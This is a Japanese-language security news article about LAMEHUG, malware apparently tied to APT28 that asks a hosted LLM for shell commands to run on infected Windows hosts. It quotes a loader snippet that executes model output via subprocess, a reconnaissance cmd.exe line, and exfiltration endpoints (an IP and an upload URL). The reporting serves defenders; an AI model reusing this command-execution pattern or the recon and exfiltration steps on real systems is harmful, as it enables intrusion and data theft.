LLM-Powered マルウェアが登場:ロシアの APT28 が採用する AI 機能の統合とは?

First Known LLM-Powered Malware From APT28 Hackers Integrates AI Capabilities into Attack Methodology

2025/07/24 CyberSecurityNews — 新たに明らかになった LAMEHUG 攻撃が示唆するのは、サイバー・セキュリティにおける画期的な出来事である。大規模言語モデル (LLM) を実環境のマルウェアにダイレクトに組み込むロシア政府系 APT28 (Fancy Bear) は、それぞれの感染させたホストから、カスタマイズされたシェル・コマンドを即座に受信できるようにしている。Hugging Face の公開 API を介することで、攻撃者は Qwen2.5-Coder-32B-Instruct モデルを呼び出す。この手法により、従来の静的ペイロード制約を回避し、これまでにはなかった柔軟性を実現している。

2025年7月17日にウクライナ CERT-UA が、同国の政府省庁の文書を装うフィッシング・メールについて警告を発したことで、LAMEHUG の存在が明らかになった。このメールには “Додаток.pdf.zip” という名の ZIP アーカイブが添付されており、その中には PyInstaller でコンパイルされた実行ファイルが取り込まれていた。

そのメールを開くと、偽の PDF ファイルが表示され、それと同時に隠されたバイナリがバックグラウンドで実行されるが、被害者は侵害に気付かない。

複数のサンプルをリバース・エンジニアリングした CATO Networks のアナリストたちが、このマルウェアの特徴を直ちに特定した。すべてのバイナリには、base64 でエンコードされたプロンプトが埋め込まれており、それがクラウド・ホスト上の LLM に送信される。そして LLM は、それぞれのホスト環境に応じてカスタマイズされた。実行可能なコマンド文字列を返すという。

市販の AI インターフェイスを選択することで、攻撃者は2つの戦略的利点を得られる。

  • 1つ目は、送信リクエストが正規のアプリケーション・トラフィックに類似しているため、シグネチャ・ベースの侵入システムの検知を回避できる点にある。
  • 2つ目は、コードの再展開に換えてプロンプトを編集するオペレーターが、偵察の深度や情報流出の範囲を即座に制御できる点にある。この柔軟性により、急速に変化する運用要件に迅速に対応できる。

初期のテレメトリにより判明したのは、ウクライナ政府のワークステーションが、最初のテストベッドにされたことだ。この観測結果が示すのは、広範な悪用に先行して APT28 は、キエフ政府を実験台にするという長年にわたる傾向である。

CERT-UA のセキュリティ情報が強調するのは、窃取されたデータの範囲である。具体的に言うと、システム・インベントリ/ネットワーク・コンフィグ/Active Directory 階層構造に加えて、Office/PDF/Text ドキュメントが再帰的に収集される。これらの情報は “%PROGRAMDATA%\info” に保管された後に、”144.126.202.227″ へ向けた SFTP トンネル、または、侵害済のドメイン “stayathomeclasses.com/slpw/up.php” へ向けた HTTP POST により送信される。

これらの送信先は、一般的なプロトコルを使用しているため、悪意のアップロードと無害なトラフィックの識別に、ネットワーク防御担当者は苦慮することになる。

感染メカニズム: AI 駆動型コマンド生成

LAMEHUG のルアーである実行ファイルが起動すると、圧縮された Python ローダーを実行するスレッドが起動する。

def LLM_QUERY_EX():
    prompt = {'messages': [{'role': 'user',
             'content': b64decode(prompt_b64_p1).decode()}],
             'temperature': 0.1,
             'model': 'Qwen/Qwen2.5-Coder-32B-Instruct'}
    cmd = query_text(prompt)
    subprocess. Run(cmd, shell=True,
                   stdout=subprocess. PIPE,
                   stderr=subprocess.STDOUT)

Додаток.pif.pdf (Attachment.pif.pdf) that the user sees while the malware is being executed (Source – CATO Networks)

最初のプロンプトは、LLMに対して「コンピュータ/ハードウェア/サービス/ネットワークの情報を収集するためのコマンドの一覧を作成し、それぞれの結果を “C:\Programdata\info\info.txt” に追加せよ。マークダウン無しでコマンドのみを返せ」と指示する。このプロンプトに対して返される行は、以下のようになる。

cmd.exe /c "mkdir %PROGRAMDATA%\info && systeminfo >> %PROGRAMDATA%\info\info.txt && wmic cpu get /format:list >> %PROGRAMDATA%\info\info.txt && ..."

2番目のプロンプトが指示するのは、ユーザーのドキュメントおよびダウンロード/デスクトップ・ディレクトリにある Office/PDF/Text の再帰的な収集である。それらのファイルに関しても、同じステージング・フォルダに格納するよう指示する。

コマンドの合成をクラウド上のモデルに委任することで、バイナリはコンパクトな状態を維持し、ハードコードされた文字列への、ブルーチームによるパターン・マッチングの試みは回避される。

防御側がアウト・バウンド AI クエリを監視しない場合には、また、最小権限のエグレスルールを適用しない場合には、LAMEHUG のモジュール型アーキテクチャは、悪意のオペレーターに対して、実行サイクルごとに最新のシステム情報を提供することになる。